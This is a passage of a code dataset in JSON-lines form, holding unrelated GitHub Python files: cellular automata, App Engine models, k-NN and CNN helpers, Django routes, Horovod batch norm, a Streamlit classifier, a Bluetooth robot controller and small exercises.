l'algorithme\r\n\r\nstats.dump(\"matrice_test_plot.txt\")\r\n\r\nprint(\"\"\"\r\nFIN\r\n\"\"\")\r\n","repo_name":"lejugeti/PARIZE_PCBS_cellular_automata","sub_path":"exemple_de_graphs/exemple_cell_auto.py","file_name":"exemple_cell_auto.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31633416226","text":"from google.appengine.ext import db as datastore\n\n\nclass Experiment(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n aws_access_key_id = datastore.StringProperty()\n aws_secret_access_key = datastore.StringProperty()\n aws_hostname = datastore.StringProperty()\n hit_id = datastore.StringProperty()\n hit_title = datastore.StringProperty()\n hit_description = datastore.StringProperty()\n hit_lifetime = datastore.IntegerProperty()\n hit_max_assignments = datastore.IntegerProperty()\n hit_keywords = datastore.StringListProperty()\n hit_duration = datastore.IntegerProperty()\n hit_approval_delay = datastore.IntegerProperty()\n hit_frame_height = datastore.IntegerProperty()\n t1_image_url = datastore.StringProperty()\n t1_reward = datastore.IntegerProperty()\n t2_image_url = datastore.StringProperty()\n group_count = datastore.IntegerProperty()\n group_index = datastore.IntegerProperty()\n\n\nclass Group(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n experiment = datastore.ReferenceProperty(Experiment)\n nickname = datastore.StringProperty()\n opening_bid = datastore.IntegerProperty()\n accept_thresh = datastore.IntegerProperty()\n reject_thresh = datastore.IntegerProperty()\n alpha = datastore.FloatProperty()\n\n\nclass Worker(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n id = datastore.StringProperty()\n assignment_id = datastore.StringProperty()\n group = datastore.ReferenceProperty(Group)\n\n\nclass Labeling(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n image_url = datastore.StringProperty()\n worker = datastore.ReferenceProperty(Worker)\n labels = datastore.StringListProperty()\n time = datastore.IntegerProperty()\n\n\nclass Negotiation(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n worker = datastore.ReferenceProperty(Worker)\n first_offer = datastore.IntegerProperty()\n first_offer_accepted = datastore.BooleanProperty(default=False)\n first_offer_rejected = datastore.BooleanProperty(default=False)\n counter_offer = datastore.IntegerProperty()\n counter_offer_accepted = datastore.BooleanProperty(default=False)\n counter_offer_rejected = datastore.BooleanProperty(default=False)\n second_offer = datastore.IntegerProperty()\n second_offer_accepted = datastore.BooleanProperty(default=False)\n second_offer_rejected = datastore.BooleanProperty(default=False)\n","repo_name":"johnjosephhorton/Hagglebot","sub_path":"gae_upload/hagglebot/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"29386763108","text":"import numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom .data_processing import preprocess_data\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\ndef train_knn_classifier(data, labels, n_neighbors=5):\n \"\"\"\n Train K-NN classifier on the given data.\n\n Args:\n data (pd.DataFrame): Data to train the classifier on.\n labels 
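# The scan/next_generation pair in the cellular-automaton program further up
# counts live neighbours cell by cell inside a double loop; with SciPy the
# whole update collapses to one convolution. A sketch under the same rules
# (live cells survive in [nb_survie, nb_surpopulation), dead cells are born
# at >= nb_naissance, and the border row/column stays dead):

import numpy as np
from scipy.signal import convolve2d

KERNEL = np.ones((3, 3))
KERNEL[1, 1] = 0  # count the 8 neighbours, not the cell itself

def next_generation_vec(pop, nb_survie, nb_surpopulation, nb_naissance):
    counts = convolve2d(pop, KERNEL, mode="same", boundary="fill")
    survive = (pop == 1) & (counts >= nb_survie) & (counts < nb_surpopulation)
    born = (pop == 0) & (counts >= nb_naissance)
    new = np.where(survive | born, 1.0, 0.0)
    new[0, :] = new[-1, :] = new[:, 0] = new[:, -1] = 0  # the loop version skips borders
    return new

# Separately, note that find_best_k below passes the whole test matrix to
# make_prediction, whose reshape(1, -1) flattens it into a single row --
# make_prediction is written for one sample. Calling knn.predict(X_test)
# directly avoids the shape mismatch.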
(pd.Series): Labels associated with the data.\n n_neighbors (int, optional): Number of neighbors to use for classification. Defaults to 5.\n\n Returns:\n KNeighborsClassifier: Trained K-NN classifier.\n \"\"\"\n knn = KNeighborsClassifier(n_neighbors=n_neighbors)\n knn.fit(data, labels)\n return knn\n\n\ndef make_prediction(knn, new_data):\n \"\"\"\n Make a prediction using the trained K-NN classifier.\n\n Args:\n knn (KNeighborsClassifier): Trained K-NN classifier.\n new_data (np.array): New input data to make predictions.\n\n Returns:\n int: Predicted label for the new data.\n \"\"\"\n # Ensure the input data is a 2D array\n new_data = np.array(new_data).reshape(1, -1)\n prediction = knn.predict(new_data)\n return prediction\n\n\ndef find_best_k(data, labels, k_range):\n \"\"\"\n Find the optimal k value for K-NN classifier.\n\n Args:\n data (pd.DataFrame): Data to train the classifier on.\n labels (pd.Series): Labels associated with the data.\n k_range (range): Range of k values to test.\n\n Returns:\n int: Optimal k value.\n \"\"\"\n X_train, X_test, y_train, y_test = train_test_split(\n data, labels, test_size=0.3, random_state=42\n )\n\n best_k = 0\n best_score = 0\n\n for k in k_range:\n knn = train_knn_classifier(X_train, y_train, n_neighbors=k)\n y_pred = make_prediction(knn, X_test)\n score = accuracy_score(y_test, y_pred)\n\n if score > best_score:\n best_score = score\n best_k = k\n\n return best_k\n","repo_name":"Lozan20/inteligentneSystemy","sub_path":"car_repair_app/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70150620260","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass ReadabilityCNN(nn.Module):\n def __init__(self, in_channel=3, dropout=.25):\n super(ReadabilityCNN, self).__init__()\n\n def discriminator_block(in_filters, out_filters, normalize=True):\n layers = [nn.Conv2d(in_filters, out_filters, 4, 2, 1)]\n layers.append(nn.Dropout2d(p = dropout))\n\n if normalize:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.1))\n\n return layers\n\n self.hidden_layers = nn.Sequential(\n *discriminator_block(in_channel, 64, normalize=False),\n *discriminator_block(64, 128),\n *discriminator_block(128, 256),\n *discriminator_block(256, 256),\n nn.ZeroPad2d((1, 0, 1, 0)),\n )\n self.outputLayer = nn.Conv2d(256, 1, 7, padding=1, bias=False)\n\n def forward(self, generatorOutput):\n hidden_layers_output = self.hidden_layers(generatorOutput)\n readability_score = self.outputLayer(hidden_layers_output)\n\n readability_score = readability_score.reshape((readability_score.shape[0],1))\n\n return readability_score\n","repo_name":"erichmond33/Attr2MDfont","sub_path":"readabilityCNN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5542794218","text":"import wx\n\nfrom application import schema, dialogs\nfrom i18n import MessageFactory\nfrom osaf.framework.blocks.Block import Block\nfrom osaf.framework.blocks import BlockEvent, ChoiceEvent, MenuItem, Menu\n\nfrom debug.generate import GenerateAllItems\nfrom debug.GenerateItemsFromFile import GenerateItems\nfrom debug.mail import loadMailTests\nfrom wx import xrc\nimport debug.generate_dialog.ItemGenerator as 
itemGenerator\n\n_ = MessageFactory(\"Chandler-debugPlugin\")\n\n\nclass TestMenuHandler(Block):\n\n def setStatusMessage(self, msg):\n Block.findBlockByName('StatusBar').setStatusMessage(msg)\n\n def on_debug_GenerateDataEvent(self, event):\n # triggered from \"Tools | Test | Generate Data\" and\n # \"Tools | Test | Generate Lots of Data\" menu items\n\n if event.arguments['sender'].blockName == '_debug_GenerateMuchDataItem':\n count = 100\n else:\n count = 4\n\n view = self.itsView\n sidebarCollection = schema.ns(\"osaf.app\", view).sidebarCollection\n\n return GenerateAllItems(view, count, sidebarCollection)\n\n def on_debug_GenerateDataFromFileEvent(self, event):\n # triggered from \"Tools | Test | Generate Items from a File\" menu\n\n res = dialogs.Util.showFileDialog(wx.GetApp().mainFrame,\n _(u\"Choose a file to import\"), \"\",\n _(u\"import.csv\"),\n _(u\"CSV files|*.csv\"),\n wx.OPEN)\n cmd, dir, filename = res\n if cmd != wx.ID_OK:\n self.setStatusMessage(_(u\"Import aborted.\"))\n return\n\n self.setStatusMessage(_(u\"Importing from %(filename)s.\")\n %{'filename': filename})\n\n return GenerateItems(self.itsView, os.path.join(dir, filename))\n \n def on_debug_GenerateDataFromDialogEvent(self, event):\n # triggered from \"Tools | Test | Generate Items from dialog\" menu\n itemGenerator.show()\n \n def on_debug_MimeTestEvent(self, event):\n loadMailTests(self.itsView, \"mime_tests\")\n\n def on_debug_i18nMailTestEvent(self, event):\n loadMailTests(self.itsView, \"i18n_tests\")\n\n\ndef makeTestMenu(parcel, toolsMenu):\n\n handler = TestMenuHandler.update(parcel, None,\n blockName='_debug_TestMenuHandler')\n\n generateDataEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_GenerateData',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n generateDataFromFileEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_GenerateDataFromFile',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n generateDataFromDialogEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_GenerateDataFromDialog',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n mimeTestEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_MimeTest',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n i18nMailTestEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_i18nMailTest',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n\n testMenu = Menu.update(parcel, None,\n blockName='_debug_testMenu',\n title=_(u'&Test'),\n parentBlock=toolsMenu)\n\n MenuItem.update(parcel, None,\n blockName='_debug_GenerateSomeDataItem',\n title=_(u'&Generate Data'),\n helpString=_(u'generates a few items of each kind'),\n event=generateDataEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_GenerateMuchDataItem',\n title=_(u'G&enerate Lots of Data'),\n helpString=_(u'generates many items of each kind'),\n event=generateDataEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_GenerateDataItemFromFile',\n title=_(u'Generate Items from a &File'),\n helpString=_(u'generates items from a file'),\n event=generateDataFromFileEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_GenerateDataFromDialog',\n title=_(u'Generate Items from a &Dialog'),\n helpString=_(u'choose items to generate from a dialog'),\n event=generateDataFromDialogEvent,\n 
parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_test_separator_1',\n menuItemKind='Separator',\n parentBlock=testMenu)\n\n MenuItem.update(parcel, None,\n blockName='_debug_MimeTest',\n title=_(u'Load MIME &Torture Tests'),\n helpString=_(u'Loads real world complex / broken mime message examples provided by Anthony Baxter'),\n event=mimeTestEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_i18nMailTest',\n title=_(u'Load i18n &Mail Tests'),\n helpString=_(u'Loads mail messages containing a variety of Charsets and Languages'),\n event=i18nMailTestEvent,\n parentBlock=testMenu)\n","repo_name":"owenmorris/chandler","sub_path":"chandler/projects/Chandler-debugPlugin/debug/TestMenu.py","file_name":"TestMenu.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"35"} +{"seq_id":"2785673342","text":"import time \n\n\ndef fibo_naive(n):\n\tif n<=2:\n\t\tf = 1\n\telse:\n\t\tf = fibo_naive(n-1) + fibo_naive(n-2)\n\treturn f\n\n#start_time = time.time()\n#fibo_naive(10)\n#print(\"--- %s seconds ---\" % (time.time() - start_time))\n\ndef fibo_memo(n):\n\tmemo={}\n\tif n in memo:\n\t\treturn memo[n]\n\tif n<=2:\n\t\tf=1\n\telse:\n\t\tf = fibo_memo(n-1) + fibo_memo(n-2)\n\t\tmemo[n] = f\n\treturn f\n\n#start_time = time.time()\n#fibo_memo(40)\n#print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\ndef fibo_opti(n):\n\tfib={}\n\tfor k in range(n):\n\t\tk+=1\n\t\tif k<=2:\n\t\t\tf = 1\n\t\telse:\n\t\t\tf = fib[k-1] + fib[k-2] \n\t\tfib[k] = f\n\treturn fib[n]\n\nstart_time = time.time()\nfibo_opti(1000)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n\n\n","repo_name":"nestorghh/coding_interview","sub_path":"cracking/DP/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71662394021","text":"board = [[5, 5, 5, 5, 5], [5, 5, 5, 5, 5], [5, 5, 5, 5, 5], [5, 5, 5, 5, 5]]\nskill = [[1, 0, 0, 3, 4, 4], [1, 2, 0, 2, 3, 2], [2, 1, 0, 3, 1, 2], [1, 0, 1, 3, 3, 1]]\n\n\ndef solution(board, skill):\n answer = 0\n lst = [[0] * (len(board[0]) + 1) for _ in range(len(board) + 1)]\n\n for i in skill:\n size = i[-1]\n if i[0] == 1:\n type = -1\n else:\n type = 1\n # 시작\n lst[i[1]][i[2]] += size * type\n # 시작점 끝\n lst[i[1]][i[4] + 1] -= size * type\n # 끝점 시작\n lst[i[3] + 1][i[2]] -= size * type\n # 끝\n lst[i[3] + 1][i[4] + 1] += size * type\n\n for i in range(len(board)):\n for j in range(1, len(board[0])):\n lst[i][j] += lst[i][j - 1]\n\n for i in range(len(board[0])):\n for j in range(1, len(board)):\n lst[j][i] += lst[j - 1][i]\n for i in range(len(board)):\n for j in range(len(board[0])):\n board[i][j] += lst[i][j]\n if board[i][j] > 0:\n answer += 1\n return answer\n\n\nprint(solution(board, skill))\n","repo_name":"Lee-hyeonkyu/co-te","sub_path":"파괴되지 않은 건물.py","file_name":"파괴되지 않은 건물.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30509028511","text":"import sys\nfrom regmaxsn.core.iterativeRegistration import IterativeRegistration\nfrom regmaxsn.core.misc import parFileCheck\nimport os\nimport pathlib as pl\n\n\ndef runRegMaxS(parFile, parNames):\n parsList = parFileCheck(parFile, parNames)\n\n for pars in parsList:\n print('Current Parameters:')\n for parN, parV in pars.items():\n print(('{}: 
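# A fix for the memoized Fibonacci a few records up: memo = {} is created
# fresh on every call -- including every recursive call -- so "n in memo" is
# never true and fibo_memo degrades to the exponential naive version. Hoisting
# the cache out of the call frame (functools.lru_cache is the idiomatic way)
# restores linear behaviour:

from functools import lru_cache

@lru_cache(maxsize=None)
def fibo_memo(n):
    if n <= 2:
        return 1
    return fibo_memo(n - 1) + fibo_memo(n - 2)  # recursive calls now hit the cache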
{}'.format(parN, parV)))\n\n resFile = pars['resFile']\n refSWC = pars['refSWC']\n testSWC = pars['testSWC']\n\n res_filepath = pl.Path(resFile)\n if res_filepath.is_file():\n\n ch = input('File exists: ' + resFile + '\\nDelete(y/n)?')\n if ch == 'y':\n res_filepath.unlink()\n else:\n quit()\n\n res_filepath.parent.mkdir(exist_ok=True)\n\n assert pl.Path(refSWC).is_file(), 'Could not find {}'.format(refSWC)\n assert pl.Path(testSWC).is_file(), 'Could not find {}'.format(testSWC)\n\n iterReg = IterativeRegistration(refSWC=pars['refSWC'],\n gridSizes=pars['gridSizes'],\n rotBounds=pars['rotBounds'],\n transBounds=pars['transBounds'],\n transMinRes=pars['transMinRes'],\n scaleMinRes=pars['minScaleStepSize'],\n rotMinRes=pars['rotMinRes'],\n nCPU=pars['nCPU'])\n\n iterReg.performReg(SWC2Align=pars['testSWC'],\n resFile=pars['resFile'],\n scaleBounds=pars['scaleBounds'],\n inPartsDir=pars['inPartsDir'],\n outPartsDir=pars['outPartsDir'],\n retainTempFiles=pars['retainTempFiles'])\n\n\nif __name__ == '__main__':\n\n from regmaxsn.core.RegMaxSPars import RegMaxSParNames\n assert len(sys.argv) == 2, 'Improper usage! Please use as \\'python RegMaxS.py parFile\\''\n\n parFile = sys.argv[1]\n\n runRegMaxS(parFile, RegMaxSParNames)\n","repo_name":"wachtlerlab/Reg-MaxS","sub_path":"regmaxsn/scripts/algorithms/RegMaxS.py","file_name":"RegMaxS.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"72315283621","text":"\nfrom django.urls import path\nfrom patient_app import views\n\napp_name='patient_app'\n\nurlpatterns = [\n path('patient_dash/',views.patientDashboard,name='patient_dash'),\n path('patient_profile/',views.patientProfile,name='patient_profile'),\n path('edit_basic//',views.editBasicInfo.as_view(),name='edit_basic'),\n path('edit_parsonal//',views.editPersonalInfo.as_view(),name='edit_parsonal'),\n path('find_doctor/',views.findDoctor,name='find_doctor'),\n path('find_catagory_doctor//',views.findDoctorCatagory,name='find_catagory_doctor'),\n path('make_appointmnet//',views.makeAppointment,name='make_appointment'),\n path('confirm_appointment///',views.confirmAppointment,name='confirm_appointment'),\n path('confirm_online_appointment///',views.confirmOnlineAppointment,name='confirm_online_appointment'),\n path('appointment_history/',views.appointmentHistory,name='appointment_history'),\n path('appointment_details//',views.appointmentDetails,name='appointment_details'),\n path('online_appointment_details//',views.onlineAppointmentDetails,name='online_appointment_details'),\n path('confirm_payment//',views.conformPayment,name='confirm_payment'),\n path('recent_prescription/',views.recentPrescription,name='recent_prescription'),\n path('prescription_list/',views.prescriptionList,name='Prescription_list'),\n path('online_prescription_list/',views.onlinePrescriptionList,name='online_Prescription_list'),\n path('prescription_details//',views.prescriptionDetails,name='prescription_details'),\n path('online_prescription_details//',views.onlinePrescriptionDetails,name='online_prescription_details'),\n \n \n\n\n]","repo_name":"Smile-94/My-Doctor-Patient-Management-Systm","sub_path":"patientmanagement/patient_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26759394382","text":"\"\"\"Synchronized batch norm using horovod and keras\"\"\"\nimport tensorflow as tf\nfrom 
tensorflow.python.keras import backend\nfrom tensorflow.python.keras.layers.normalization import BatchNormalizationBase\nfrom tensorflow.python.util.tf_export import keras_export\nfrom horovod.tensorflow.mpi_ops import _allreduce\nfrom horovod.tensorflow.mpi_ops import size\nfrom horovod.tensorflow.mpi_ops import Sum\n\n\ndef reduce_sum(x):\n return _allreduce(x, op=Sum)\n\n\n# pylint: disable=g-classes-have-attributes\n@keras_export('keras.layers.experimental.SyncBatchNormalizationHorovod', v1=[])\nclass SyncBatchNormalizationHorovod(BatchNormalizationBase):\n r\"\"\"Normalize and scale inputs or activations synchronously across replicas.\n \"\"\"\n\n def __init__(self,\n axis=-1,\n momentum=0.99,\n epsilon=1e-3,\n center=True,\n scale=True,\n beta_initializer='zeros',\n gamma_initializer='ones',\n moving_mean_initializer='zeros',\n moving_variance_initializer='ones',\n beta_regularizer=None,\n gamma_regularizer=None,\n beta_constraint=None,\n gamma_constraint=None,\n **kwargs):\n if kwargs.pop('fused', None):\n raise ValueError(\n '`fused` argument cannot be True for SyncBatchNormalization.')\n\n # Currently we only support aggregating over the global batch size.\n super(SyncBatchNormalizationHorovod, self).__init__(\n axis=axis,\n momentum=momentum,\n epsilon=epsilon,\n center=center,\n scale=scale,\n beta_initializer=beta_initializer,\n gamma_initializer=gamma_initializer,\n moving_mean_initializer=moving_mean_initializer,\n moving_variance_initializer=moving_variance_initializer,\n beta_regularizer=beta_regularizer,\n gamma_regularizer=gamma_regularizer,\n beta_constraint=beta_constraint,\n gamma_constraint=gamma_constraint,\n fused=False,\n **kwargs)\n\n def _calculate_mean_and_var(self, x, axes, keep_dims):\n\n with backend.name_scope('moments'):\n y = tf.cast(x, tf.float32) if x.dtype == tf.float16 else x\n\n # Compute true mean while keeping the dims for proper broadcasting.\n worker_mean = tf.reduce_mean(y, axes, keepdims=True, name='mean')\n worker_variance = tf.reduce_mean(\n tf.math.squared_difference(y, tf.stop_gradient(worker_mean)),\n axes,\n keepdims=True,\n name='variance')\n if size() > 1:\n worker_square_of_mean = tf.math.square(worker_mean)\n worker_mean_of_square = worker_variance + worker_square_of_mean\n group_mean = reduce_sum(worker_mean)\n group_mean_of_square = reduce_sum(worker_mean_of_square)\n group_mean /= size()\n group_mean_of_square /= size()\n group_variance = group_mean_of_square - tf.math.square(group_mean)\n mean, var = group_mean, group_variance\n else:\n mean, var = worker_mean, worker_variance\n\n if not keep_dims:\n mean = tf.squeeze(mean, axes)\n var = tf.squeeze(var, axes)\n if x.dtype == tf.float16:\n return (tf.cast(mean, tf.float16), tf.cast(var, tf.float16))\n else:\n return (mean, var)\n","repo_name":"renmengye/online-unsup-proto-net","sub_path":"fewshot/models/modules/keras_sync_batch_norm.py","file_name":"keras_sync_batch_norm.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"39619894453","text":"#from distutils.core import setup\n#from distutils.extension import Extension\n#\nfrom setuptools import setup\nfrom setuptools.extension import Extension\n\nimport subprocess\n\nimport os\n\n#update version\nargs = 'git describe --tags'\np = subprocess.Popen(args.split(), stdout=subprocess.PIPE)\nlong_version = p.communicate()[0].decode(\"utf-8\").strip()\nspl = long_version.split('-')\n\nif len(spl) == 3:\n main_version = spl[0]\n 
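# The synchronized moments in _calculate_mean_and_var above rest on the
# identity Var(x) = E[x^2] - E[x]^2: each worker allreduces its local mean and
# mean-of-squares, and the averaged pair recovers the global variance. A NumPy
# check of that algebra (hypothetical equal-sized worker shards; the
# unweighted average in the layer likewise assumes equal per-worker batches):

import numpy as np

shards = [np.random.randn(64, 8), np.random.randn(64, 8)]
worker_means = [s.mean(axis=0) for s in shards]
worker_mean_sqs = [(s ** 2).mean(axis=0) for s in shards]

group_mean = sum(worker_means) / len(shards)        # allreduce(mean) / size
group_mean_sq = sum(worker_mean_sqs) / len(shards)  # allreduce(E[x^2]) / size
group_var = group_mean_sq - group_mean ** 2

full = np.concatenate(shards, axis=0)
assert np.allclose(group_mean, full.mean(axis=0))
assert np.allclose(group_var, full.var(axis=0))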
commit_number = spl[1]\n version_hash = spl[2]\n version = f'{main_version}.dev{commit_number}'\nelse:\n version_hash = '---'\n version = long_version\n \n# version = \"1.0\" # pipeline with database\n\n# Set this to true to add install_requires to setup\n# Turned off for incremental builds as it kills \"reload(mastquery.query)\" \nif 0:\n install_requires=[\n 'astropy>=2.0.0',\n 'scipy',\n 'numpy>=1.10.2',\n 'matplotlib>=2.0.2',\n 'mpdaf>=1.0']\nelse:\n install_requires = [] \n \n#lines = open('grizli/version.py').readlines()\nversion_str =f\"\"\"# git describe --tags\n__version__ = \"{version}\"\n__long_version__ = \"{long_version}\"\n__version_hash__ = \"{version_hash}\"\n\"\"\"\n\nfp = open('mospipe/version.py','w')\nfp.write(version_str)\nfp.close()\nprint('Git version: {0}'.format(version))\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"mospipe\",\n version = version,\n author = \"Gabriel Brammer\",\n author_email = \"gbrammer@gmail.com\",\n description = \"MOSFIRE pipeline\",\n license = \"MIT\",\n url = \"https://github.com/gbrammer/mospipe\",\n download_url = \"https://github.com/gbrammer/mospipe/tarball/{0}\".format(version),\n packages=['mospipe'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Astronomy',\n ],\n install_requires=install_requires,\n package_data={'mospipe': ['data/*']},\n)\n","repo_name":"gbrammer/mospipe","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5010335585","text":"i = 0 \nwhile i < 10:\n i += 1\n print(i)\n #break # to break the flow and come out of 'while loop'\nelse :\n print(\"You are out of loop\")\n\n\nwhile True:\n response = input(\"Say Something :\")\n if response == 'bye':\n break\n\n\n# break, \n# continue\n# pass pass is just a filler for loop. 
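# The version block in the setup.py above turns `git describe --tags` output
# such as "1.2-14-g3a5b7c9" into a PEP 440 dev version. The same rule as a
# standalone sketch (function name hypothetical); note that a tag which itself
# contains a hyphen would throw the three-way split off:

def parse_describe(long_version):
    parts = long_version.strip().split('-')
    if len(parts) == 3:
        main, commits, _sha = parts    # tag, commits since tag, abbreviated hash
        return f"{main}.dev{commits}"
    return long_version                # a bare tag passes through unchanged

assert parse_describe("1.2-14-g3a5b7c9") == "1.2.dev14"
assert parse_describe("1.2") == "1.2"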
does Nothing","repo_name":"shailendravaichalkar/python","sub_path":"Basic 2/whileLoop.py","file_name":"whileLoop.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75214050019","text":"# Import library\nfrom tensorflow import keras\nimport streamlit as st\nfrom PIL import ImageOps, Image\nimport numpy as np\n\n# Name page title\nst.set_page_config(page_title=\"Rock Paper Scissors\", layout=\"wide\")\nst.title(\"Rock Paper Scissors Hand Pose Prediction\")\ntry:\n # Input image\n file = st.file_uploader(\n \"Upload your hand with rock, paper, or scissors pose!\", type=[\"png\", \"jpg\"]\n )\n image = Image.open(file)\n img = ImageOps.fit(image, (224, 224))\n # Grayscale the image\n gray = ImageOps.grayscale(img)\n\n img_array = np.asarray(gray)\n x = np.expand_dims(img_array, axis=0)\n images = np.vstack([x])\n\n # get model\n model_path = \"chosen_model.hdf5\"\n model = keras.models.load_model(model_path)\n\n # Predict uploaded image with model\n classes = model.predict(images)\n\n if classes[0][0] == 1:\n st.info(\"It's Paper!\")\n elif classes[0][1] == 1:\n st.info(\"It's Rock!\")\n else:\n st.info(\"It's Scissors!\")\n left_co, cent_co, last_co = st.columns(3)\n with cent_co:\n st.image(file)\n\nexcept:\n # Set error if image isn't uploded yet\n st.error(\"Please upload your hand!\")\n st.stop()\n","repo_name":"imandreans/Rock-Paper-Scissors-Prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35205701170","text":"#!/usr/bin/python3\n\nimport sys\nimport socket\n\nemac = '00:1B:10:60:4C:9E' # external bluetooth module MAC addr\nport = 3 # not sure\n\nclass MBot(object):\n def __init__(self, on_dist=None):\n self.s = socket.socket(socket.AF_BLUETOOTH, proto=socket.BTPROTO_RFCOMM)\n print('connecting...')\n self.s.connect((emac, port))\n self.s.setblocking(False)\n print('connected')\n \n self.sendlines = []\n self.recvbuf = bytearray()\n self.recvlines = []\n\n self.on_dist = None\n\n def reconnect(self):\n if self.s is not None: self.s.close()\n\n self.s = socket.socket(socket.AF_BLUETOOTH, proto=socket.BTPROTO_RFCOMM)\n print('connecting...', file=sys.stderr)\n self.s.connect((emac, port))\n # self.s.setblocking(False)\n print('connected', file=sys.stderr)\n\n def move(self,left_deg, right_deg, left_speed = 100, right_speed = 100):\n self.send(f\"Move,{left_deg},{right_deg},{left_speed},{right_speed}\\n\")\n\n def query_dist_cm(self):\n self.send(\"QueryDistanceCM\\n\")\n \n def send(self, msg):\n # add msg to send buffer\n self.sendlines.append(msg)\n\n try:\n while len(self.sendlines) > 0:\n # we have some buffered messages, try to send them first\n head = self.sendlines[0]\n self.s.send(bytes(head, \"UTF-8\"))\n _ = self.sendlines.pop(0)\n except BlockingIOError as e:\n print(\"Error sending messages. 
In queue: \" + int(len(self.sendlines)), file=sys.stderr)\n \n def read(self):\n msgbuf = []\n try:\n self.recvbuf += self.s.recv(2048)\n nl = self.recvbuf.find(b\"\\n\")\n while nl != -1:\n msgb = self.recvbuf[:nl]\n msgs = msgb.decode('UTF-8', errors='replace')\n if msgs.startswith('!'):\n msgbuf.append(msgs[1:].split(','))\n else:\n print('[rover] ' + msgs)\n self.recvbuf = self.recvbuf[nl+1:]\n nl = self.recvbuf.find(b\"\\n\")\n except BlockingIOError as e:\n pass\n return msgbuf\n","repo_name":"chrismooredev/cse314-mbot-control","sub_path":"mbot.py","file_name":"mbot.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30447666918","text":"#!/bin/python3.6\n\nimport json\nimport sys\n\nfrom mpp import Utils\n\nargs = sys.argv[1:]\nif len(args) < 2:\n print('Usage: extract_jokes.py ')\n\ndirs = args[0]\nout = args[1]\n\nfor file in Utils.get_files(dirs):\n raw = []\n if not file.endswith('.json'):\n print(file, 'is not a json file, did not read')\n continue\n\n print('Reading', file)\n with open(file, 'r', encoding='utf-8') as f:\n jokes = json.loads(f.read())\n\n # Each joke is represented as a dict of attributes\n for joke in jokes:\n full = ''\n if 'title' in joke:\n title = joke['title'].strip()\n # Trying to preserve the full context of the Reddit jokes (some will be missed unfortunately)\n if title.endswith('?'):\n full += title + ' '\n else:\n continue\n full += joke['body']\n raw.append(full)\n\n outfile = out + file[file.rfind('/'):-5] + '.txt'\n with open(outfile, 